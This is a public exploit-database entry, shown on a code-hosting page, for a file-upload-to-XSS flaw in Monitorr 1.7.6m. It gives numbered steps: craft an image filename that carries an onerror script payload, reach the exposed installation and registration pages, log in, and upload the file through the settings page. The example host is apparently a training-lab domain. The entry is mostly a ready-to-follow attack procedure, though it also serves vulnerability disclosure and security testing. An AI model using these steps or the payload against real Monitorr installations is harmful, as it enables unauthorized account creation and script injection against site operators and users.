2dbd546dde
3 changes to exploits/shellcodes WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Kimai 1.14 - CSV Injection Montiorr 1.7.6m - File Upload to XSS
25 lines
No EOL
1 KiB
Text
25 lines
No EOL
1 KiB
Text
# Exploit Title: Montiorr 1.7.6m - File Upload to XSS
|
|
# Date: 25/4/2021
|
|
# Exploit Author: Ahmad Shakla
|
|
# Software Link: https://github.com/Monitorr/Monitorr
|
|
# Tested on: Kali GNU/Linux 2020.2
|
|
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
|
|
|
|
An attacker can preform an XSS attack via image upload
|
|
|
|
Steps :
|
|
|
|
1)Create a payload with the following format :
|
|
><img src=x onerror=alert("XSS")>.png
|
|
|
|
2) Install the database by going to the following link :
|
|
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
|
|
|
|
3)Register for a new account on the server by going to the following link :
|
|
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
|
|
|
|
4)Login with your credentials on the following link :
|
|
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
|
|
|
|
5)Go to the following link and upload the payload :
|
|
https://monitorr.robyns-petshop.thm/settings.php#services-configuration |